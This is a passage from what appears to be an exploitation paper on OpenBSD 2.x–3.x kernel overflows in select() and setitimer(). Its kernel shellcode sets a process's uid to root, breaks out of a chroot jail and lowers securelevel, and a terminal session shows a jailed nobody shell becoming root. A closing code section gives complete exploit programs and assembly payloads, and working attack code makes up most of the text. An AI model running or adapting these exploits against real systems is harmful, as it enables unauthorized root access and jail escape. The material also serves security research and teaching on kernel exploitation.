cmpb $0xe8,%bl          # if bl == 0xe8 : 'call'
jne  up

lea  (%edx,%ecx),%ebx   # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx   # take the displacement of the call ins.
add  $0x5,%ecx          # add 5 to displacement
add  %ebx,%ecx          # ecx = _Xosyscall_end+0x20 + disp = _syscall()

At this stage %ecx holds the address of the real handler _syscall(). The
next step is to find out where to return inside the syscall() function
which eventually leads to a broader research on various versions of OpenBSD
with various kernel compilation options. Luckily, it turns out to be safe
to search for the 'call *%eax' instruction inside the _syscall(), because
this turns out to be the instruction that dispatches every system call to
its final handler in every OpenBSD version I have tested.

For OpenBSD 2.6 through 3.1 kernel code always dispatched the system calls
with the 'call *%eax' instruction, which is unique in the scope of
_syscall() function.

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/i _syscall+0x240
_syscall+0x240:	call	*%eax
ddb>cont

Our goal is now to figure out the offset (0x240 in the above disasm) for
any kernel version so that we can return to the instruction just after it
from our payload and achieve our goal. The code to search for 'call *%eax'
is as follows:

# _syscall+0x240: ff
# _syscall+0x241: d0    0x240->0x241 OBSD3.1

mov  %ecx,%edi         # ecx is the addr of _syscall 
movw $0xd0ff,%ax       # search for ffd0 'call *%eax'
cld
mov  $0xffffffff,%ecx
repnz
scasw                  # scan (%edi++) for %ax

# %edi gets incremented one last time before breaking the loop
# %edi contains the instruction address just after 'call *%eax' 
# so return to it!!!

xor  %eax,%eax         #set up the return value = Success ;)

push %edi              # push %edi on the stack and return to it
ret


Finally, this is all we needed for a clean return. This payload can be used
for any syscall overflow without requiring any further modification.
 

--[ 5.3 - _db_lookup() technique 


This technique introduces no new concepts; it is just another kernel text
search to find out the address of _db_lookup() -- the kernel land
equivalent of dlsym(). The search is based on the function fingerprint,
which is fairly safe on the recent versions on which the code has been
developed, but it might not work on the older versions. I choose to keep it
out of the text for brevity's sake but it's exact the same 'repnz scas'
concept just used in the idtr technique. (for sample code, contact me.)

 
--[ 5.4 - /usr/bin/nm, kvm_open(), nlist()


/usr/bin/nm, kvm library and nlist() library interface can all be used to
gather kernel land symbols and offsets but, as we already mentioned, they
all require a readable kernel image and/or additional privileges which in
most secured systems are not usually avaliable.

Furthermore, the most obvious problem with these interfaces are that they
won't work at all in chroot()ed environments with no privileges (nobody).
These are the main reasons I have not used these techniques within the
exploitation phase of privilege escalation and chroot breaking, but after
establishing full control over the system (uid = 0 and out of jail), I have
made use of offline binary symbol gathering in order to reset the
securelevel, more about this later.


--[ 5.5 - %ebp fixup


After taking care of the saved return address, we need to fix %ebp to
prevent crashes in later stages (especially in _syscall() code). The proper
way to calculate %ebp is to find out the difference between the stack
pointer and the saved base pointer at the procedure exit and used this
static number to restore %ebp. For all the versions of OpenBSD 2.6 through
3.1 this difference was 0x68 bytes. You can simply set a breakpoint on
_sys_select prolog and another one just before the 'leave' instruction at
the epilog and calculate the difference between the %ebp recorded at the
prolog and the %esp recorded just before the epilog.

lea  0x68(%esp),%ebp # fixup ebp

Above instruction would be enough to set the %ebp back to its old value.


--[ 6 - Payload/Shellcode Creation


In the following sections we'll develop small payloads that modify certain
fields of its parent process' proc structure to achieve elevated privileges
and break out of chroot/jail environments. Then, we'll chain the developed
assembly code with the sidt code to work our way back to user land and
enjoy our new privileges.


--[ 6.1 - What to achieve


Setting up a jail with nobody privileges and trying to break out of it
seems like a fairly good goal to achieve. Since all these privilege
separation terms are brought into OpenBSD with the latest OpenSSH, it would
be nice to actually demonstrate how trivial it would be to bypass this kind
of 'protection' by way of such kernel level vulnerabilities.

Certain inetd.conf services and OpenSSH are run as nobody/user in a
chrooted/jailed environment -- intended to be an additional assurance of
security. This is a totally false sense of security; jailme.c code follows:

jailme.c:

#include <stdio.h>

int
main()
{
        chdir("/var/tmp/jail");
        chroot("/var/tmp/jail");
        setgroups(NULL, NULL);
        setgid(32767);
        setegid(32767);
        setuid(32767);
        seteuid(32767);
        execl("/bin/sh", "jailed", NULL);
}

bash-2.05a# gcc -o jailme jailme.c
bash-2.05a# cp jailme /tmp/jailme
bash-2.05a# mkdir /var/tmp/jail
bash-2.05a# mkdir /var/tmp/jail/usr
bash-2.05a# mkdir /var/tmp/jail/bin /var/tmp/jail/usr/lib
bash-2.05a# mkdir /var/tmp/jail/usr/libexec
bash-2.05a# cp /bin/sh /var/tmp/jail/bin/
bash-2.05a# cp /usr/bin/id /var/tmp/jail/bin/
bash-2.05a# cp /bin/ls /var/tmp/jail/bin/
bash-2.05a# cp /usr/lib/libc.so.28.3 /var/tmp/jail/usr/lib/
bash-2.05a# cp /usr/libexec/ld.so /var/tmp/jail/usr/libexec/
bash-2.05a# cat >> /etc/inetd.conf 
1024            stream  tcp     nowait  root    /tmp/jailme
^C
bash-2.05a# ps aux | grep inetd
root     19121  0.0  1.1   148   352 p0  S+     8:19AM    0:00.05 grep 
inetd 
root     27152  0.0  1.1    64   348 ??  Is     6:00PM    0:00.08 inetd 
bash-2.05a# kill -HUP 27152
bash-2.05a# nc -v localhost 1024
Connection to localhost 1024 port [tcp/*] succeeded!
ls -l /
total 4
drwxr-xr-x  2 0  0  512 Dec  9 16:23 bin
drwxr-xr-x  4 0  0  512 Dec  9 16:21 usr
id
uid=32767 gid=32767
ps
jailed: <stdin>[4]: ps: not found
....


--[ 6.2 - The payload


Throughout this section we will introduce all the tiny bits of the complete
payload. So all these section chained together will form the eventual
payload, which will be available at the code section (10) of this paper.


--[ 6.2.1 - p_cred & u_cred


We'll start with the privilege elevation section of the payload. Following
is the payload to update ucred (credentials of user) and pcred (credentials
of the process) of any given proc structure. Exploit code fills in the proc
address of its parent process by using the sysctl() system call (discussed
on 5.1) replacing .long 0x12345678. The following 'call' and 'pop'
instructions will load the address of the given proc structure address into
%edi. The typical address gathering technique used in almost every PIC
%shellcode [ALEPH1].

call moo
.long 0x12345678   <-- pproc addr
.long 0xdeadcafe
.long 0xbeefdead
nop
nop
nop
moo:
pop  %edi
mov  (%edi),%ecx      # parent's proc addr in ecx

		      # update p_ruid
mov  0x10(%ecx),%ebx  # ebx = p->p_cred
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0

	              # update cr_uid
mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred
mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0


--[ 6.2.2 - chroot breaking


Next tiny assembly fragment will be the chroot breaker of our complete
payload.

Without going into extra detail (time is running out, deadline is within 3
days ;)), lets take a brief look of how chroot is checked on a per-process
basis. chroot jails are implemented by filling in the fd_rdir member of the
filedesc (open files structure) with the desired jail directories vnode
pointer. When kernel is giving certain services to any process, it checks
for the existence of this pointer and if it's filled with a vnode that
process is handled slightly different and kernel will create the notion of
a new root directory for this process thus jailing it into a predefined
directory. For a regular process this pointer is zero / unset.  So without
any further need to go into implementation level details, just setting this
pointer to NULL means FREEDOM! fd_rdir is referenced through the proc
structure as follows:

p->p_fd->fd_rdir 

As with the credentials structure, filedesc is also trivial to access and
alter, with only 2 instruction additions to our payload.

# update p->p_fd->fd_rdir to break chroot()

mov  0x14(%ecx),%edx  	# edx = p->p_fd
mov  %eax,0xc(%edx)   	# p->p_fd->fd_rdir = 0


--[ 6.2.3 - securelevel  


OpenBSD has 4 different securelevels starting from permanently insecure to
highly secure mode. The system by default runs at level 1 which is the
secure mode. Secure mode restrictions are as follows:

-   securelevel may no longer be lowered except by init
-   /dev/mem and /dev/kmem may not be written to
-   raw disk devices of mounted file systems are read-only
-   system immutable and append-only file flags may not be removed
-   kernel modules may not be loaded or unloaded

Some of these restrictions might complicate further compromise of the
system. So we should also take care of the securelevel flag and reset it to
0, which is the insecure level that gives you privileges such as being able
to load kernel modules to further penetrate the system.

But there were many problems in run time searching of the address of
securelevel in memory without false positives so I chose to utilize this
attack at a later stage. The stage that we get uid 0 and break free out of
jail, now we have all the interfaces available mentioned in section 5.4 to
query any kernel symbol and retrieve its address.

bash-2.05a# /usr/bin/nm /bsd | grep securelevel
e05cff38 B _securelevel

For this reason an additional, second stage exploit was crafted (without
any difference, other then the payload) that executes the following
assembly routine and returns to user land, using the idtr technique. See
ex_select_obsd_secl.c in section 10

call moo
.long 0x12345678     <-- address of securelevel filled by user
moo:
pop  %edi
mov  (%edi),%ebx      # address of securelevel in ebx
		      # reset security level to 0/insecure
xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)      # securelevel = 0

... 


--[ 6.3 - Get root & escape jail


All of the above chained into 2 piece of exploit code. Here is the door to
freedom! (Exploits and payloads can be found in section 10)

bash-2.05a# gcc -o ex ex_select_obsd.c
bash-2.05a# gcc -o ex2 ex_select_obsd_secl.c
bash-2.05a# cp ex /var/tmp/jail/
bash-2.05a# cp ex2 /var/tmp/jail/
bash-2.05a# nc -v localhost 1024
id
uid=32767 gid=32767
ls /
bin
ex
ex2
usr
./ex


[*] OpenBSD 2.x - 3.x select() kernel overflow     [*]
[*] by    Sinan "noir" Eren  -  noir@olympos.org   [*]


userland: 0x0000df38 parent_proc: 0xe46373a4
id
uid=0(root) gid=32767(nobody)
uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
ls /
.cshrc
.profile
altroot
bin
boot
bsd
dev
etc
...
sysctl kern.securelevel
kern.securelevel = 1
nm /bsd | grep _securelevel
e05cff38 B _securelevel
./ex2 e05cff38
sysctl kern.securelevel
kern.securelevel = 0

... ;)

Directly copying the exploit into the jailed environment might seem a bit
unrealistic but it really is not an issue with system call redirection
[MAXIMI] or even by using little more imaginative shellcodes, you can
execute anything from a remote source without any further need for a shell
interpreter. To the best of my knowledge there is 2 commercial products
that have already achieved such remote execution simulations. [IMPACT],
[CANVAS]


--[ 7 - Conclusions


My goal in writing this paper was try to prove kernel land vulnerabilities
such as stack overflows and integer conditions can be exploited and lead to
total control over the system, no matter how strict your user land (i.e.,
privilege separation) or even kernel land (i.e., chroot, systrace,
securelevel) enforcements are ... I also tried to contribute to the newly
raised concepts (greets to Gera) of fail-safe and reusable exploitation
code generation.

I would like to end this article with my favorite vuln-dev posting of all
time:

Subject:   RE: OpenSSH Vulns (new?) Priv seperation
[...]
reducing root-run code from 27000 to 2500 lines is the important part.
who cares how many holes there are when it is in /var/empty/sshd chroot
with no possibility of root :)

XXXXX

[ I CARE. lol! ;)]


--[ 8 - Greetings


Thanks to Dan and Dave for correcting my English and committing many logic
fixes. Thanks to certain anonymous people for their help and support.

Greets to: optyx, dan, dave aitel, gera, bind, jeru, #convers
uberhax0r, olympos and gsu.linux ppl

Most thanks of all to goes to Asli for support, help and her never-ending
affection. Seni Seviyorum, mosirrr!!


--[ 9 -	References


- [ESA]     	Exploiting Kernel Buffer Overflows FreeBSD Style
		http://online.securityfocus.com/archive/1/153336

- [LSD-PL]	Kernel Level Vulnerabilities, 5th Argus Hacking Challenge
		http://lsd-pl.net/kernel_vulnerabilities.html

- [4.4 BSD]	The Design and Implementation of the 4.4BSD Operating
		System

- [Intel]	Intel Pentium 4 Processors Manuals
		http://developer.intel.com/design/Pentium4/manuals/

- [ALEPH1]	Smashing The Stack For Fun And Profit
		http://www.phrack.org/show.php?p=49&a=14

- [MAXIMI]	Syscall Proxying - Simulating Remote Execution
		http://www.corest.com/files/files/13/BlackHat2002.pdf

- [IMPACT]	http://www.corest.com/products/coreimpact/index.php

- [CANVAS]	http://www.immunitysec.com/CANVAS

- [ODED]	Big Loop Integer Protection
		Phrack #60 0x09 by Oded Horovitz

--[ 10 - Code


<++> ./ex_kernel/ex_select_obsd.c
/** 
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 ** Sinan "noir" Eren 
 ** noir@olympos.org | noir@uberhax0r.net
 ** (c) 2002 
 **
 **/   

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* kernel_sc.s shellcode */ 
unsigned char shellcode[] = 
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
"\x89\xcf\x66\xb8\xff\xd0\xfc\xb9\xff\xff\xff\xff\xf2\x66\xaf\x31\xc0"
"\x57\xc3";

void sig_handler();
void get_proc(pid_t, struct kinfo_proc *);

int
main(int argc, char **argv)
{
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, pprocadr;
   struct kinfo_proc kp;

  printf("\n\n[*] OpenBSD 2.x - 3.x select() kernel overflow   [*]\n");
  printf("[*] by  Sinan \"noir\" Eren  -  noir@olympos.org  [*]\n");
  printf("\n\n"); sleep(1);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
		    perror("malloc"); 
		    exit(-1);
		 }
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	get_proc((pid_t) getppid(), &kp);
	pprocadr = (u_long) kp.kp_eproc.e_paddr;

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = pprocadr & 0xff;
	shellcode[6] = (pprocadr >> 8) & 0xff;
	shellcode[7] = (pprocadr >> 16) & 0xff;
	shellcode[8] = (pprocadr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

        printf("userland: 0x%.8x ", ptr);	
	printf("parent_proc: 0x%.8x\n", pprocadr);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
						 PROT_WRITE) < 0) {
		perror("mprotect");	
		exit(-1);
	}

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);

done:	
	free(fptr);	
}	

void
sig_handler()
{
   exit(0);
}

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                fprintf(stderr, "this is an unexpected error, rerun!\n");
                exit(-1);
        }

}
<--> ./ex_kernel/ex_select_obsd.c
<++> ./ex_kernel/ex_select_obsd_secl.c
/** 
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 **
 ** securelevel reset exploit, this is the second stage attack
 **
 ** Sinan "noir" Eren 
 ** noir@olympos.org | noir@uberhax0r.net
 ** (c) 2002 
 **
 **/   

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* sel_sc.s shellcode */
unsigned char shellcode[] = 
"\xe8\x04\x00\x00\x00\x78\x56\x34\x12\x5f\x8b\x1f\x31\xc0\x89\x03\x8d"
"\x6c\x24\x68\x0f\x01\x4f\x04\x8b\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b"
"\x8b\x04\x04\x00\x00\xc1\xe9\x10\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10"
"\x09\xca\x31\xc9\x41\x8a\x1c\x0a\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41"
"\x8b\x0c\x0a\x83\xc1\x05\x01\xd9\x89\xcf\x66\xb8\xff\xd0\xfc\xb9\xff"
"\xff\xff\xff\xf2\x66\xaf\x31\xc0\x57\xc3";

void sig_handler();

int
main(int argc, char **argv)
{
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, secladr;

	if(!argv[1]) {
	printf("Usage: %s secl_addr\nsecl_addr: /usr/bin/nm /bsd |"
       	" grep _securelevel\n", argv[0]);
	exit(0);
	}

	secladr = strtoul(argv[1], NULL, 16);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
		    perror("malloc"); 
		    exit(-1);
		 }
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = secladr & 0xff;
	shellcode[6] = (secladr >> 8) & 0xff;
	shellcode[7] = (secladr >> 16) & 0xff;
	shellcode[8] = (secladr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
					 PROT_WRITE) < 0) {
		perror("mprotect");	
		exit(-1);
	}

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);

done:	
	free(fptr);	
}	

void
sig_handler()
{
   exit(0);
}
<--> ./ex_kernel/ex_select_obsd_secl.c
<++> ./ex_kernel/ex_setitimer_obsd.c
/**
 ** OpenBSD 2.x 3.x setitimer() kernel memory write exploit 
 ** Sinan "noir" Eren
 ** noir@olympos.org | noir@uberhax0r.net
 ** (c) 2002
 **
 **/

#include <stdio.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/time.h>
#include <sys/sysctl.h>


struct itimerval val, oval;
int which = 0;

int
main(int argc, char **argv)
{
   find_which();
   setitimer(which, &val, &oval);
   seteuid(0);
   setuid(0);
   printf("uid: %d euid: %d gid: %d \n", getuid(), geteuid(), getgid());
   execl("/bin/sh", "noir", NULL);
}

find_which()
{
   unsigned int arr[4], len;
   struct kinfo_proc kp;
   long stat, cred, rem;

	memset(&val, 0x00, sizeof(val));
	val.it_interval.tv_sec = 0x00;  //fill this with cr_ref
	val.it_interval.tv_usec = 0x00;
	val.it_value.tv_sec = 0x00;
	val.it_value.tv_usec = 0x00;

	arr[0] = CTL_KERN;
	arr[1] = KERN_PROC;
	arr[2] = KERN_PROC_PID;
	arr[3] = getpid();
	len = sizeof(struct kinfo_proc);
	if(sysctl(arr, 4, &kp, &len, NULL, 0) < 0) {
		perror("sysctl");
		fprintf(stderr, "this is an unexpected error, rerun!\n");
		exit(-1);
	}

	printf("proc: %p\n\n", (u_long) kp.kp_eproc.e_paddr);
	printf("pc_ucred: %p ", (u_long) kp.kp_eproc.e_pcred.pc_ucred);

	printf("p_ruid: %d\n\n", (u_long) kp.kp_eproc.e_pcred.p_ruid);
	printf("proc->p_cred->p_ruid: %p, proc->p_stats: %p\n", 
	(char *) (kp.kp_proc.p_cred) + 4, kp.kp_proc.p_stats);
        printf("cr_ref: %d\n", (u_long) kp.kp_eproc.e_ucred.cr_ref);
	
	cred = (long) kp.kp_eproc.e_pcred.pc_ucred;	
	stat = (long) kp.kp_proc.p_stats;
	val.it_interval.tv_sec = kp.kp_eproc.e_ucred.cr_ref;
	
	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	case 0xc:
         break;
	case 0x0:
	 printf("using u_cred, we will have perminent euid=0\n");
	 goto out;
	} 
			
	val.it_interval.tv_sec = 0x00;
	cred = (long) ((char *) kp.kp_proc.p_cred+4);
	stat = (long) kp.kp_proc.p_stats;

	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;	
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	 printf("too bad rem is fucked!\nlet me know about this!!\n"); 
         exit(0);
	case 0x0:
	 break;
	case 0xc:
	 which += 0x10;
	} 
	printf("\nusing p_cred instead of u_cred, only the new process "
	       "will be priviliged\n");

out:
	which = which >> 4;
	printf("which: %.8x\n", which);	
	printf("addr to overwrite: %.8x\n", stat + 0x90 + (which * 0x10));
}
<--> ./ex_kernel/ex_setitimer_obsd.c
<++> ./ex_kernel/kernel_sc.s
# kernel level shellcode
# noir@olympos.org |  noir@uberhax0r.net
# 2002
.text
	.align 2,0x90

.globl _main
	.type	_main , @function
_main:

call moo
.long 0x12345678
.long 0xdeadcafe
.long 0xbeefdead
nop
nop
nop
moo:
pop  %edi
mov  (%edi),%ecx      # parent's proc addr on ecx

# update p_cred->p_ruid
mov  0x10(%ecx),%ebx  # ebx = p_cred 
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)
# p_ruid = 0

# update pc_ucred->cr_uid
mov  (%ebx),%edx      # edx = pc_ucred
mov  %eax,0x4(%edx)
# cr_uid = 0

# update p_fd->fd_rdir to break chroot()
mov  0x14(%ecx),%edx # edx = p_fd
mov  %eax,0xc(%edx)
# p_fd->fd_rdir = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
up:
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	0x240,0x241 on obsd3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
cld
mov  $0xffffffff,%ecx 
repnz 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
ret
<--> ./ex_kernel/kernel_sc.s
<++> ./ex_kernel/secl_sc.s
# securelevel reset shellcode
# noir@olympos.org |  noir@uberhax0r.net
# 2002
.text
	.align 2,0x90
.globl _main
	.type	_main , @function
_main:
call moo
.long 0x12345678
moo:
pop  %edi
mov  (%edi),%ebx      # address of securelevel

xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)
# securelevel = 0

lea  0x68(%esp),%ebp
# set ebp to normal

# find where to return: sidt technique
sidt 0x4(%edi)
mov  0x6(%edi),%ebx   # mov _idt_region in eax
mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
mov  0x404(%ebx),%ecx # _idt_region[0x404]
shr  $0x10,%ecx
sal  $0x10,%ecx
sal  $0x10,%edx
shr  $0x10,%edx
or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end

# search for Xosyscall_end+XXX: call _syscall instruction

xor  %ecx,%ecx
up:
inc  %ecx
movb (%edx,%ecx),%bl
cmpb $0xe8,%bl
jne  up

lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
add  $0x5,%ecx        # add 5 to displacement
add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp

# search for _syscall+0xXXX: call *%eax 
# and return to where we were supposed to!
# _syscall+0x240: ff
# _syscall+0x241: d0	OBSD3.1

mov  %ecx,%edi         # ecx is addr of _syscall
movw $0xd0ff,%ax
cld
mov  $0xffffffff,%ecx 
repnz 
scasw    #scan (%edi++) for %ax

#return to *%edi
xor  %eax,%eax  #set up the return value to Success ;)
push %edi
ret
<--> ./ex_kernel/secl_sc.s

|=[ EOF ]=---------------------------------------------------------------=|